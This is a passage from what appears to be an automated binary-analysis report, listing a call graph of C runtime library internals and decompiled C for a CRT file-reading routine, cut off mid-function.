calls 6808->6809 6809->6811 6812 3b1ca2 __dosmaperr 58 API calls 6810->6812 6811->6736 6811->6748 6812->6811 6814 3b6f45 __close_nolock 58 API calls 6813->6814 6817 3b898c 6814->6817 6815 3b89e2 6816 3b6ebf __free_osfhnd 59 API calls 6815->6816 6819 3b89ea 6816->6819 6817->6815 6818 3b89c0 6817->6818 6820 3b6f45 __close_nolock 58 API calls 6817->6820 6818->6815 6821 3b6f45 __close_nolock 58 API calls 6818->6821 6822 3b8a0c 6819->6822 6825 3b1ca2 __dosmaperr 58 API calls 6819->6825 6823 3b89b7 6820->6823 6824 3b89cc CloseHandle 6821->6824 6822->6740 6826 3b6f45 __close_nolock 58 API calls 6823->6826 6824->6815 6827 3b89d8 GetLastError 6824->6827 6825->6822 6826->6818 6827->6815 6829 3b7054 __lseeki64_nolock 60 API calls 6828->6829 6830 3b870a 6829->6830 6831 3b7054 __lseeki64_nolock 60 API calls 6830->6831 6840 3b876f 6830->6840 6835 3b8726 6831->6835 6832 3b1cc3 __setmbcp 58 API calls 6841 3b877a 6832->6841 6833 3b880e 6839 3b7054 __lseeki64_nolock 60 API calls 6833->6839 6856 3b8874 6833->6856 6834 3b874f GetProcessHeap HeapAlloc 6836 3b876a 6834->6836 6848 3b8783 __setmode_nolock 6834->6848 6835->6833 6835->6834 6835->6840 6838 3b1cc3 __setmbcp 58 API calls 6836->6838 6837 3b7054 __lseeki64_nolock 60 API calls 6837->6840 6838->6840 6842 3b8826 6839->6842 6840->6832 6840->6841 6841->6740 6842->6840 6843 3b6f45 __close_nolock 58 API calls 6842->6843 6844 3b883a SetEndOfFile 6843->6844 6845 3b885a 6844->6845 6844->6856 6847 3b1cc3 __setmbcp 58 API calls 6845->6847 6849 3b885f 6847->6849 6850 3b87d4 6848->6850 6852 3b87e3 __setmode_nolock 6848->6852 6929 3b7e88 6848->6929 6851 3b1c8f __dosmaperr 58 API calls 6849->6851 6853 3b1c8f __dosmaperr 58 API calls 6850->6853 6854 3b886a GetLastError 6851->6854 6857 3b87f8 GetProcessHeap HeapFree 6852->6857 6855 3b87d9 6853->6855 6854->6856 6855->6852 6858 3b1cc3 __setmbcp 58 API calls 6855->6858 6856->6837 6856->6840 6857->6856 6858->6852 6860 3b7da5 _flsall 6859->6860 6861 3b7dc9 6860->6861 6862 3b7db2 6860->6862 6864 3b7e68 6861->6864 6867 3b7ddd 6861->6867 6863 3b1c8f __dosmaperr 58 API calls 6862->6863 6866 3b7db7 6863->6866 6865 3b1c8f __dosmaperr 58 API calls 6864->6865 6870 3b7e00 6865->6870 6871 3b1cc3 __setmbcp 58 API calls 6866->6871 6868 3b7dfb 6867->6868 6869 3b7e05 6867->6869 6872 3b1c8f __dosmaperr 58 API calls 6868->6872 6873 3b6c88 ___lock_fhandle 59 API calls 6869->6873 6875 3b1cc3 __setmbcp 58 API calls 6870->6875 6882 3b7dbe _flsall 6871->6882 6872->6870 6874 3b7e0b 6873->6874 6876 3b7e1e 6874->6876 6877 3b7e31 6874->6877 6878 3b7e74 6875->6878 6879 3b7e88 __write_nolock 76 API calls 6876->6879 6881 3b1cc3 __setmbcp 58 API calls 6877->6881 6880 3b1e89 __wcsnicmp_l 9 API calls 6878->6880 6883 3b7e2a 6879->6883 6880->6882 6884 3b7e36 6881->6884 6882->6748 7005 3b7e60 6883->7005 6885 3b1c8f __dosmaperr 58 API calls 6884->6885 6885->6883 6888 3b6f2b 6887->6888 6891 3b6ecb 6887->6891 6889 3b1cc3 __setmbcp 58 API calls 6888->6889 6890 3b6f30 6889->6890 6892 3b1c8f __dosmaperr 58 API calls 6890->6892 6891->6888 6895 3b6ef4 6891->6895 6893 3b6f1c 6892->6893 6893->6737 6894 3b6f16 SetStdHandle 6894->6893 6895->6893 6895->6894 6911 3b4599 LeaveCriticalSection 6896->6911 6898 3b6df5 6898->6777 6900 3b6c94 _flsall 6899->6900 6901 3b6ce3 EnterCriticalSection 6900->6901 6903 3b442f __lock 58 API calls 6900->6903 6902 3b6d09 _flsall 6901->6902 6902->6769 6904 3b6cb9 6903->6904 6905 3b6cd1 6904->6905 6906 3b40a2 __mtinitlocks InitializeCriticalSectionAndSpinCount 6904->6906 6912 3b6d0d 6905->6912 6906->6905 6915 3b4599 LeaveCriticalSection 6908->6915 6910 3b6ebd 6910->6768 6911->6898 6913 3b4599 _doexit LeaveCriticalSection 6912->6913 6914 3b6d14 6913->6914 6914->6901 6915->6910 6917 3b6f50 6916->6917 6918 3b6f65 6916->6918 6919 3b1c8f __dosmaperr 58 API calls 6917->6919 6921 3b1c8f __dosmaperr 58 API calls 6918->6921 6923 3b6f8a 6918->6923 6920 3b6f55 6919->6920 6922 3b1cc3 __setmbcp 58 API calls 6920->6922 6924 3b6f94 6921->6924 6926 3b6f5d 6922->6926 6923->6806 6925 3b1cc3 __setmbcp 58 API calls 6924->6925 6927 3b6f9c 6925->6927 6926->6806 6928 3b1e89 __wcsnicmp_l 9 API calls 6927->6928 6928->6926 6930 3b7e95 __write_nolock 6929->6930 6931 3b7ef3 6930->6931 6932 3b7ed4 6930->6932 6960 3b7ec9 6930->6960 6935 3b7f4b 6931->6935 6936 3b7f2f 6931->6936 6934 3b1c8f __dosmaperr 58 API calls 6932->6934 6933 3b5770 __cftoe_l 6 API calls 6937 3b86e9 6933->6937 6938 3b7ed9 6934->6938 6940 3b7f64 6935->6940 6943 3b7054 __lseeki64_nolock 60 API calls 6935->6943 6939 3b1c8f __dosmaperr 58 API calls 6936->6939 6937->6848 6941 3b1cc3 __setmbcp 58 API calls 6938->6941 6942 3b7f34 6939->6942 6988 3b6c34 6940->6988 6944 3b7ee0 6941->6944 6946 3b1cc3 __setmbcp 58 API calls 6942->6946 6943->6940 6947 3b1e89 __wcsnicmp_l 9 API calls 6944->6947 6950 3b7f3b 6946->6950 6947->6960 6948 3b7f72 6949 3b82cb 6948->6949 6997 3b36db 6948->6997 6951 3b82e9 6949->6951 6952 3b865e WriteFile 6949->6952 6953 3b1e89 __wcsnicmp_l 9 API calls 6950->6953 6955 3b840d 6951->6955 6963 3b82ff 6951->6963 6956 3b82be GetLastError 6952->6956 6961 3b828b 6952->6961 6953->6960 6967 3b8418 6955->6967 6980 3b8502 6955->6980 6956->6961 6958 3b8697 6958->6960 6965 3b1cc3 __setmbcp 58 API calls 6958->6965 6959 3b7fdd 6959->6949 6962 3b7fed GetConsoleCP 6959->6962 6960->6933 6961->6958 6961->6960 6966 3b83eb 6961->6966 6962->6958 6986 3b801c 6962->6986 6963->6958 6963->6961 6964 3b836e WriteFile 6963->6964 6964->6956 6964->6963 6968 3b86c5 6965->6968 6969 3b868e 6966->6969 6970 3b83f6 6966->6970 6967->6958 6967->6961 6972 3b847d WriteFile 6967->6972 6973 3b1c8f __dosmaperr 58 API calls 6968->6973 6975 3b1ca2 __dosmaperr 58 API calls 6969->6975 6974 3b1cc3 __setmbcp 58 API calls 6970->6974 6971 3b8577 WideCharToMultiByte 6971->6956 6971->6980 6972->6956 6972->6967 6973->6960 6976 3b83fb 6974->6976 6975->6960 6978 3b1c8f __dosmaperr 58 API calls 6976->6978 6977 3b85c6 WriteFile 6977->6980 6981 3b8619 GetLastError 6977->6981 6978->6960 6980->6958 6980->6961 6980->6971 6980->6977 6981->6980 6982 3b92bb 60 API calls __write_nolock 6982->6986 6983 3b92d3 WriteConsoleW CreateFileW __putwch_nolock 6983->6986 6984 3b8105 WideCharToMultiByte 6984->6961 6985 3b8140 WriteFile 6984->6985 6985->6956 6985->6986 6986->6956 6986->6961 6986->6982 6986->6983 6986->6984 6987 3b819a WriteFile 6986->6987 7002 3b91b5 6986->7002 6987->6956 6987->6986 6989 3b6c3f 6988->6989 6990 3b6c4c 6988->6990 6991 3b1cc3 __setmbcp 58 API calls 6989->6991 6993 3b6c58 6990->6993 6994 3b1cc3 __setmbcp 58 API calls 6990->6994 6992 3b6c44 6991->6992 6992->6948 6993->6948 6995 3b6c79 6994->6995 6996 3b1e89 __wcsnicmp_l 9 API calls 6995->6996 6996->6992 6998 3b36f3 __getptd_noexit 58 API calls 6997->6998 6999 3b36e1 6998->6999 7000 3b36ee GetConsoleMode 6999->7000 7001 3b17be __lock 58 API calls 6999->7001 7000->6949 7000->6959 7001->7000 7003 3b917b __isleadbyte_l 58 API calls 7002->7003 7004 3b91c2 7003->7004 7004->6986 7008 3b702e LeaveCriticalSection 7005->7008 7007 3b7e66 7007->6882 7008->7007 7009->6753 7011 3b637d 7010->7011 7019 3b6394 7010->7019 7012 3b6384 7011->7012 7014 3b63a5 7011->7014 7013 3b1cc3 __setmbcp 58 API calls 7012->7013 7015 3b6389 7013->7015 7021 3b4bfc 7014->7021 7017 3b1e89 __wcsnicmp_l 9 API calls 7015->7017 7017->7019 7018 3b8b0f 60 API calls __towlower_l 7020 3b63b0 7018->7020 7019->6666 7020->7018 7020->7019 7022 3b4c0d 7021->7022 7026 3b4c5a 7021->7026 7023 3b36db __setmbcp 58 API calls 7022->7023 7025 3b4c13 7023->7025 7024 3b4c3a 7024->7026 7044 3b4f1d 7024->7044 7025->7024 7029 3b7356 7025->7029 7026->7020 7030 3b7362 _flsall 7029->7030 7031 3b36db __setmbcp 58 API calls 7030->7031 7032 3b736b 7031->7032 7033 3b739a 7032->7033 7035 3b737e 7032->7035 7034 3b442f __lock 58 API calls 7033->7034 7036 3b73a1 7034->7036 7037 3b36db __setmbcp 58 API calls 7035->7037 7056 3b73d6 7036->7056 7041 3b7383 7037->7041 7042 3b7391 _flsall 7041->7042 7043 3b17be __lock 58 API calls 7041->7043 7042->7024 7043->7042 7045 3b4f29 _flsall 7044->7045 7046 3b36db __setmbcp 58 API calls 7045->7046 7047 3b4f33 7046->7047 7048 3b442f __lock 58 API calls 7047->7048 7049 3b4f45 7047->7049 7050 3b4f63 7048->7050 7052 3b17be __lock 58 API calls 7049->7052 7053 3b4f53 _flsall 7049->7053 7054 3b4831 _free 58 API calls 7050->7054 7055 3b4f90 7050->7055 7052->7053 7053->7026 7054->7055 7094 3b4fba 7055->7094 7057 3b73e1 ___addlocaleref ___removelocaleref 7056->7057 7059 3b73b5 7056->7059 7057->7059 7063 3b715c 7057->7063 7060 3b73cd 7059->7060 7093 3b4599 LeaveCriticalSection 7060->7093 7062 3b73d4 7062->7041 7064 3b71d5 7063->7064 7067 3b7171 7063->7067 7065 3b4831 _free 58 API calls 7064->7065 7066 3b7222 7064->7066 7068 3b71f6 7065->7068 7069 3b724b 7066->7069 7070 3b8d75 ___free_lc_time 58 API calls 7066->7070 7067->7064 7074 3b4831 _free 58 API calls 7067->7074 7077 3b71a2 7067->7077 7072 3b4831 _free 58 API calls 7068->7072 7075 3b72aa 7069->7075 7090 3b4831 58 API calls _free 7069->7090 7071 3b7240 7070->7071 7073 3b4831 _free 58 API calls 7071->7073 7076 3b7209 7072->7076 7073->7069 7079 3b7197 7074->7079 7080 3b4831 _free 58 API calls 7075->7080 7081 3b4831 _free 58 API calls 7076->7081 7082 3b4831 _free 58 API calls 7077->7082 7092 3b71c0 7077->7092 7078 3b4831 _free 58 API calls 7083 3b71ca 7078->7083 7084 3b8c12 ___free_lconv_mon 58 API calls 7079->7084 7085 3b72b0 7080->7085 7086 3b7217 7081->7086 7087 3b71b5 7082->7087 7088 3b4831 _free 58 API calls 7083->7088 7084->7077 7085->7059 7089 3b4831 _free 58 API calls 7086->7089 7091 3b8d0e ___free_lconv_num 58 API calls 7087->7091 7088->7064 7089->7066 7090->7069 7091->7092 7092->7078 7093->7062 7097 3b4599 LeaveCriticalSection 7094->7097 7096 3b4fc1 7096->7049 7097->7096 7099 3b1ffb LeaveCriticalSection 7098->7099 7100 3b1fdc 7098->7100 7099->6640 7100->7099 7101 3b1fe3 7100->7101 7104 3b4599 LeaveCriticalSection 7101->7104 7103 3b1ff8 7103->6640 7104->7103 7106 3b14a8 _flsall 7105->7106 7107 3b14eb 7106->7107 7108 3b14be _memset 7106->7108 7109 3b14e3 _flsall 7106->7109 7118 3b1f5e 7107->7118 7112 3b1cc3 __setmbcp 58 API calls 7108->7112 7109->6588 7114 3b14d8 7112->7114 7116 3b1e89 __wcsnicmp_l 9 API calls 7114->7116 7116->7109 7119 3b1f6e 7118->7119 7120 3b1f90 EnterCriticalSection 7118->7120 7119->7120 7121 3b1f76 7119->7121 7122 3b14f1 7120->7122 7123 3b442f __lock 58 API calls 7121->7123 7124 3b12bc 7122->7124 7123->7122 7126 3b12d7 _memset 7124->7126 7131 3b12f2 7124->7131 7125 3b12e2 7127 3b1cc3 __setmbcp 58 API calls 7125->7127 7126->7125 7126->7131 7136 3b1332 7126->7136 7128 3b12e7 7127->7128 7129 3b1e89 __wcsnicmp_l 9 API calls 7128->7129 7129->7131 7138 3b1525 7131->7138 7132 3b1443 _memset 7135 3b1cc3 __setmbcp 58 API calls 7132->7135 7135->7128 7136->7131 7136->7132 7141 3b2873 7136->7141 7148 3b2a2a 7136->7148 7216 3b2752 7136->7216 7236 3b2897 7136->7236 7139 3b1fcd __wfsopen 2 API calls 7138->7139 7140 3b152b 7139->7140 7140->7109 7142 3b287d 7141->7142 7143 3b2892 7141->7143 7144 3b1cc3 __setmbcp 58 API calls 7142->7144 7143->7136 7145 3b2882 7144->7145 7146 3b1e89 __wcsnicmp_l 9 API calls 7145->7146 7147 3b288d 7146->7147 7147->7136 7149 3b2a4b 7148->7149 7150 3b2a62 7148->7150 7151 3b1c8f __dosmaperr 58 API calls 7149->7151 7152 3b319a 7150->7152 7156 3b2a9c 7150->7156 7153 3b2a50 7151->7153 7154 3b1c8f __dosmaperr 58 API calls 7152->7154 7155 3b1cc3 __setmbcp 58 API calls 7153->7155 7157 3b319f 7154->7157 7161 3b2a57 7155->7161 7158 3b2aa4 7156->7158 7165 3b2abb 7156->7165 7159 3b1cc3 __setmbcp 58 API calls 7157->7159 7162 3b1c8f __dosmaperr 58 API calls 7158->7162 7160 3b2ab0 7159->7160 7164 3b1e89 __wcsnicmp_l 9 API calls 7160->7164 7161->7136 7163 3b2aa9 7162->7163 7169 3b1cc3 __setmbcp 58 API calls 7163->7169 7164->7161 7165->7161 7166 3b2ad0 7165->7166 7168 3b2aea 7165->7168 7171 3b2b08 7165->7171 7167 3b1c8f __dosmaperr 58 API calls 7166->7167 7167->7163 7168->7166 7170 3b2af5 7168->7170 7169->7160 7174 3b6c34 __read_nolock 58 API calls 7170->7174 7172 3b48b1 __malloc_crt 58 API calls 7171->7172 7173 3b2b18 7172->7173 7175 3b2b3b 7173->7175 7176 3b2b20 7173->7176 7177 3b2c09 7174->7177 7180 3b7054 __lseeki64_nolock 60 API calls 7175->7180 7178 3b1cc3 __setmbcp 58 API calls 7176->7178 7179 3b2c82 ReadFile 7177->7179 7183 3b2c1f GetConsoleMode 7177->7183 7181 3b2b25 7178->7181 7182 3b3162 GetLastError 7179->7182 7187 3b2ca4 7179->7187 7180->7170 7184 3b1c8f __dosmaperr 58 API calls 7181->7184 7185 3b316f 7182->7185 7186 3b2c62 7182->7186 7188 3b2c7f 7183->7188 7189 3b2c33 7183->7189 7184->7161 7190 3b1cc3 __setmbcp 58 API calls 7185->7190 7195 3b1ca2 __dosmaperr 58 API calls 7186->7195 7198 3b2c68 7186->7198 7187->7182 7191 3b2c74 7187->7191 7188->7179 7189->7188 7192 3b2c39 ReadConsoleW 7189->7192 7193 3b3174 7190->7193 7191->7198 7199 3b2cd9 7191->7199 7208 3b2f46 7191->7208 7192->7191 7194 3b2c5c GetLastError 7192->7194 7196 3b1c8f __dosmaperr 58 API calls 7193->7196 7194->7186 7195->7198 7196->7198 7197 3b4831 _free 58 API calls 7197->7161 7198->7161 7198->7197 7200 3b2d45 ReadFile 7199->7200 7206 3b2dc6 7199->7206 7203 3b2d66 GetLastError 7200->7203 7214 3b2d70 7200->7214 7202 3b304c ReadFile 7209 3b306f GetLastError 7202->7209 7215 3b307d 7202->7215 7203->7214 7204 3b2e83 7210 3b2e33 MultiByteToWideChar 7204->7210 7211 3b7054 __lseeki64_nolock 60 API calls 7204->7211 7205 3b2e73 7207 3b1cc3 __setmbcp 58 API calls 7205->7207 7206->7198 7206->7204 7206->7205 7206->7210 7207->7198 7208->7198 7208->7202 7209->7215 7210->7194 7210->7198 7211->7210 7212 3b7054 __lseeki64_nolock 60 API calls 7212->7214 7213 3b7054 __lseeki64_nolock 60 API calls 7213->7215 7214->7199 7214->7212 7215->7208 7215->7213 7217 3b275d 7216->7217 7221 3b2772 7216->7221 7218 3b1cc3 __setmbcp 58 API calls 7217->7218 7219 3b2762 7218->7219 7220 3b1e89 __wcsnicmp_l 9 API calls 7219->7220 7228 3b276d 7220->7228 7222 3b27a7 7221->7222 7221->7228 7283 3b65a7 7221->7283 7224 3b2873 __fclose_nolock 58 API calls 7222->7224 7225 3b27bb 7224->7225 7250 3b2916 7225->7250 7227 3b27c2 7227->7228 7229 3b2873 __fclose_nolock 58 API calls 7227->7229 7228->7136 7230 3b27e5 7229->7230 7230->7228 7231 3b2873 __fclose_nolock 58 API calls 7230->7231 7232 3b27f1 7231->7232 7232->7228 7233 3b2873 __fclose_nolock 58 API calls 7232->7233 7234 3b27fe 7233->7234 7235 3b2873 __fclose_nolock 58 API calls 7234->7235 7235->7228 7237 3b28a6 7236->7237 7246 3b28a2 _memmove 7236->7246 7238 3b28ad 7237->7238 7241 3b28c0 _memset 7237->7241 7239 3b1cc3 __setmbcp 58 API calls 7238->7239 7240 3b28b2 7239->7240 7242 3b1e89 __wcsnicmp_l 9 API calls 7240->7242 7243 3b28ee 7241->7243 7244 3b28f7 7241->7244 7241->7246 7242->7246 7245 3b1cc3 __setmbcp 58 API calls 7243->7245 7244->7246 7247 3b1cc3 __setmbcp 58 API calls 7244->7247 7248 3b28f3 7245->7248 7246->7136 7247->7248 7249 3b1e89 __wcsnicmp_l 9 API calls 7248->7249 7249->7246 7251 3b2922 _flsall 7250->7251 7252 3b292f 7251->7252 7253 3b2946 7251->7253 7254 3b1c8f __dosmaperr 58 API calls 7252->7254 7255 3b2a0a 7253->7255 7258 3b295a 7253->7258 7257 3b2934 7254->7257 7256 3b1c8f __dosmaperr 58 API calls 7255->7256 7259 3b297d 7256->7259 7260 3b1cc3 __setmbcp 58 API calls 7257->7260 7261 3b2978 7258->7261 7262 3b2985 7258->7262 7269 3b1cc3 __setmbcp 58 API calls 7259->7269 7265 3b293b _flsall 7260->7265 7266 3b1c8f __dosmaperr 58 API calls 7261->7266 7263 3b2992 7262->7263 7264 3b29a7 7262->7264 7267 3b1c8f __dosmaperr 58 API calls 7263->7267 7268 3b6c88 ___lock_fhandle 59 API calls 7264->7268 7265->7227 7266->7259 7270 3b2997 7267->7270 7271 3b29ad 7268->7271 7272 3b299f 7269->7272 7273 3b1cc3 __setmbcp 58 API calls 7270->7273 7274 3b29d3 7271->7274 7275 3b29c0 7271->7275 7277 3b1e89 __wcsnicmp_l 9 API calls 7272->7277 7273->7272 7278 3b1cc3 __setmbcp 58 API calls 7274->7278 7276 3b2a2a __read_nolock 70 API calls 7275->7276 7279 3b29cc 7276->7279 7277->7265 7280 3b29d8 7278->7280 7286 3b2a02 7279->7286 7281 3b1c8f __dosmaperr 58 API calls 7280->7281 7281->7279 7284 3b48b1 __malloc_crt 58 API calls 7283->7284 7285 3b65bc 7284->7285 7285->7222 7289 3b702e LeaveCriticalSection 7286->7289 7288 3b2a08 7288->7265 7289->7288 7293 3b1932 7290->7293 7292 3b17d9 7294 3b193e _flsall 7293->7294 7295 3b442f __lock 51 API calls 7294->7295 7296 3b1945 7295->7296 7297 3b19fe _doexit 7296->7297 7298 3b1973 DecodePointer 7296->7298 7313 3b1a4c 7297->7313 7298->7297 7300 3b198a DecodePointer 7298->7300 7306 3b199a 7300->7306 7302 3b1a5b _flsall 7302->7292 7304 3b19a7 EncodePointer 7304->7306 7305 3b1a43 7307 3b1a4c 7305->7307 7308 3b17a8 __mtinitlocknum 3 API calls 7305->7308 7306->7297 7306->7304 7309 3b19b7 DecodePointer EncodePointer 7306->7309 7310 3b1a59 7307->7310 7318 3b4599 LeaveCriticalSection 7307->7318 7308->7307 7312 3b19c9 DecodePointer DecodePointer 7309->7312 7310->7292 7312->7306 7314 3b1a2c 7313->7314 7315 3b1a52 7313->7315 7314->7302 7317 3b4599 LeaveCriticalSection 7314->7317 7319 3b4599 LeaveCriticalSection 7315->7319 7317->7305 7318->7310 7319->7314 7899 3b2460 7900 3b248a 7899->7900 7901 3b2497 7899->7901 7902 3b5770 __cftoe_l 6 API calls 7900->7902 7903 3b5770 __cftoe_l 6 API calls 7901->7903 7902->7901 7909 3b24a7 __except_handler4 7903->7909 7904 3b25bf 7905 3b2574 __except_handler4 7905->7904 7906 3b25af 7905->7906 7907 3b5770 __cftoe_l 6 API calls 7905->7907 7908 3b5770 __cftoe_l 6 API calls 7906->7908 7907->7906 7908->7904 7909->7904 7909->7905 7911 3b24fe __IsNonwritableInCurrentImage 7909->7911 7917 3b2722 RtlUnwind 7911->7917 7912 3b25d6 7914 3b5770 __cftoe_l 6 API calls 7912->7914 7913 3b253c __except_handler4 7913->7912 7915 3b5770 __cftoe_l 6 API calls 7913->7915 7916 3b25e6 __except_handler4 7914->7916 7915->7912 7917->7913 8002 3b8bc0 8003 3b8bcc _flsall 8002->8003 8004 3b8c03 _flsall 8003->8004 8005 3b442f __lock 58 API calls 8003->8005 8006 3b8be0 8005->8006 8007 3b73d6 __updatetlocinfoEx_nolock 58 API calls 8006->8007 8008 3b8bf0 8007->8008 8010 3b8c09 8008->8010 8013 3b4599 LeaveCriticalSection 8010->8013 8012 3b8c10 8012->8004 8013->8012 7918 3b16e7 7919 3b16fc 7918->7919 7920 3b16f6 7918->7920 7924 3b17da 7919->7924 7921 3b187c _raise 58 API calls 7920->7921 7921->7919 7923 3b1701 _flsall 7925 3b1932 _doexit 58 API calls 7924->7925 7926 3b17e5 7925->7926 7926->7923 7659 3b35a6 7660 3b35b2 _flsall 7659->7660 7661 3b36ba _flsall 7660->7661 7662 3b4831 _free 58 API calls 7660->7662 7664 3b35cb 7660->7664 7662->7664 7663 3b35da 7665 3b35e9 7663->7665 7667 3b4831 _free 58 API calls 7663->7667 7664->7663 7666 3b4831 _free 58 API calls 7664->7666 7668 3b35f8 7665->7668 7669 3b4831 _free 58 API calls 7665->7669 7666->7663 7667->7665 7670 3b3607 7668->7670 7671 3b4831 _free 58 API calls 7668->7671 7669->7668 7672 3b3616 7670->7672 7674 3b4831 _free 58 API calls 7670->7674 7671->7670 7673 3b3625 7672->7673 7675 3b4831 _free 58 API calls 7672->7675 7676 3b3637 7673->7676 7677 3b4831 _free 58 API calls 7673->7677 7674->7672 7675->7673 7678 3b442f __lock 58 API calls 7676->7678 7677->7676 7682 3b363f 7678->7682 7679 3b3662 7691 3b36c6 7679->7691 7682->7679 7684 3b4831 _free 58 API calls 7682->7684 7683 3b442f __lock 58 API calls 7689 3b3676 ___removelocaleref 7683->7689 7684->7679 7685 3b36a7 7694 3b36d2 7685->7694 7688 3b4831 _free 58 API calls 7688->7661 7689->7685 7690 3b715c ___freetlocinfo 58 API calls 7689->7690 7690->7685 7697 3b4599 LeaveCriticalSection 7691->7697 7693 3b366f 7693->7683 7698 3b4599 LeaveCriticalSection 7694->7698 7696 3b36b4 7696->7688 7697->7693 7698->7696 7836 3b4985 7837 3b4988 7836->7837 7840 3b7580 7837->7840 7851 3b49b3 DecodePointer 7840->7851 7842 3b7585 7843 3b7590 7842->7843 7852 3b49dc 7842->7852 7844 3b759a IsProcessorFeaturePresent 7843->7844 7850 3b75b8 7843->7850 7846 3b75a5 7844->7846 7848 3b1d2c __call_reportfault 7 API calls 7846->7848 7847 3b187c _raise 58 API calls 7849 3b75c2 7847->7849 7848->7850 7850->7847 7851->7842 7856 3b49e8 _flsall 7852->7856 7853 3b4a52 7854 3b4a2f DecodePointer 7853->7854 7860 3b4a61 7853->7860 7859 3b4a1e _siglookup 7854->7859 7855 3b4a19 7857 3b36f3 __getptd_noexit 58 API calls 7855->7857 7856->7853 7856->7854 7856->7855 7861 3b4a15 7856->7861 7857->7859 7864 3b4abf 7859->7864 7866 3b187c _raise 58 API calls 7859->7866 7872 3b4a27 _flsall 7859->7872 7862 3b1cc3 __setmbcp 58 API calls 7860->7862 7861->7855 7861->7860 7863 3b4a66 7862->7863 7865 3b1e89 __wcsnicmp_l 9 API calls 7863->7865 7867 3b442f __lock 58 API calls 7864->7867 7869 3b4aca 7864->7869 7865->7872 7866->7864 7867->7869 7868 3b4b2c EncodePointer 7870 3b4aff 7868->7870 7869->7868 7869->7870 7873 3b4b5d 7870->7873 7872->7843 7874 3b4b68 7873->7874 7875 3b4b61 7873->7875 7874->7872 7877 3b4599 LeaveCriticalSection 7875->7877 7877->7874 7699 3b9624 7700 3b962c __cfltcvt_init 7699->7700 7701 3b9637 7700->7701 7703 3bb3ca 7700->7703 7709 3bc2af 7703->7709 7705 3bb3dd 7706 3bb3e4 7705->7706 7707 3b1e99 __invoke_watson 8 API calls 7705->7707 7706->7701 7708 3bb3f0 7707->7708 7711 3bc2cb __control87 7709->7711 7714 3bc2eb __control87 7709->7714 7710 3b1cc3 __setmbcp 58 API calls 7712 3bc2e1 7710->7712 7711->7710 7713 3b1e89 __wcsnicmp_l 9 API calls 7712->7713 7713->7714 7714->7705

                    Executed Functions

                    Function 003B12BC Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 3b12bc-3b12d5 1 3b12f2 0->1 2 3b12d7-3b12dc 0->2 4 3b12f4-3b12fa 1->4 2->1 3 3b12de-3b12e0 2->3 5 3b12fb-3b1300 3->5 6 3b12e2-3b12e7 call 3b1cc3 3->6 7 3b130e-3b1312 5->7 8 3b1302-3b130c 5->8 18 3b12ed call 3b1e89 6->18 11 3b1322-3b1324 7->11 12 3b1314-3b131f call 3b1530 7->12 8->7 10 3b1332-3b1341 8->10 16 3b1348 10->16 17 3b1343-3b1346 10->17 11->6 15 3b1326-3b1330 11->15 12->11 15->6 15->10 20 3b134d-3b1352 16->20 17->20 18->1 22 3b143b-3b143e 20->22 23 3b1358-3b135f 20->23 22->4 24 3b1361-3b1369 23->24 25 3b13a0-3b13a2 23->25 24->25 28 3b136b 24->28 26 3b140c-3b140d call 3b2752 25->26 27 3b13a4-3b13a6 25->27 35 3b1412-3b1416 26->35 30 3b13ca-3b13d5 27->30 31 3b13a8-3b13b0 27->31 32 3b1469 28->32 33 3b1371-3b1373 28->33 38 3b13d9-3b13dc 30->38 39 3b13d7 30->39 36 3b13b2-3b13be 31->36 37 3b13c0-3b13c4 31->37 34 3b146d-3b1476 32->34 40 3b137a-3b137f 33->40 41 3b1375-3b1377 33->41 34->4 35->34 44 3b1418-3b141d 35->44 45 3b13c6-3b13c8 36->45 37->45 42 3b1443-3b1447 38->42 46 3b13de-3b13ea call 3b2873 call 3b2a2a 38->46 39->38 40->42 43 3b1385-3b139e call 3b2897 40->43 41->40 49 3b1459-3b1464 call 3b1cc3 42->49 50 3b1449-3b1456 call 3b1530 42->50 59 3b1401-3b140a 43->59 44->42 48 3b141f-3b1430 44->48 45->38 61 3b13ef-3b13f4 46->61 54 3b1433-3b1435 48->54 49->18 50->49 54->22 54->23 59->54 62 3b147b-3b147f 61->62 63 3b13fa-3b13fd 61->63 62->34 63->32 64 3b13ff 63->64 64->59
                    C-Code - Quality: 69%
                    			E003B12BC(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				char* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __esi;
				signed int _t74;
				signed int _t78;
				char _t81;
				signed int _t86;
				signed int _t88;
				signed int _t91;
				signed int _t94;
				signed int _t97;
				signed int _t98;
				char* _t99;
				signed int _t100;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				char* _t110;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				void* _t120;

				_t99 = _a4;
				_t74 = _a8;
				_v8 = _t99;
				_v12 = _t74;
				if(_a12 == 0) {
					L5:
					return 0;
				}
				_t97 = _a16;
				if(_t97 == 0) {
					goto L5;
				}
				if(_t99 != 0) {
					_t119 = _a20;
					__eflags = _t119;
					if(_t119 == 0) {
						L9:
						__eflags = _a8 - 0xffffffff;
						if(_a8 != 0xffffffff) {
							_t74 = E003B1530(_t99, 0, _a8);
							_t120 = _t120 + 0xc;
						}
						__eflags = _t119;
						if(_t119 == 0) {
							goto L3;
						} else {
							_t78 = _t74 | 0xffffffff;
							__eflags = _t97 - _t78 / _a12;
							if(_t97 > _t78 / _a12) {
								goto L3;
							}
							L13:
							_t117 = _a12 * _t97;
							__eflags =  *(_t119 + 0xc) & 0x0000010c;
							_t98 = _t117;
							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
								_t100 = 0x1000;
							} else {
								_t100 =  *(_t119 + 0x18);
							}
							_v16 = _t100;
							__eflags = _t117;
							if(_t117 == 0) {
								L41:
								return _a16;
							} else {
								do {
									__eflags =  *(_t119 + 0xc) & 0x0000010c;
									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
										L24:
										__eflags = _t98 - _t100;
										if(_t98 < _t100) {
											_t81 = E003B2752(_t98, _t119, _t119); // executed
											__eflags = _t81 - 0xffffffff;
											if(_t81 == 0xffffffff) {
												L46:
												return (_t117 - _t98) / _a12;
											}
											_t102 = _v12;
											__eflags = _t102;
											if(_t102 == 0) {
												L42:
												__eflags = _a8 - 0xffffffff;
												if(_a8 != 0xffffffff) {
													E003B1530(_a4, 0, _a8);
												}
												 *((intOrPtr*)(E003B1CC3())) = 0x22;
												L4:
												E003B1E89();
												goto L5;
											}
											_t110 = _v8;
											 *_t110 = _t81;
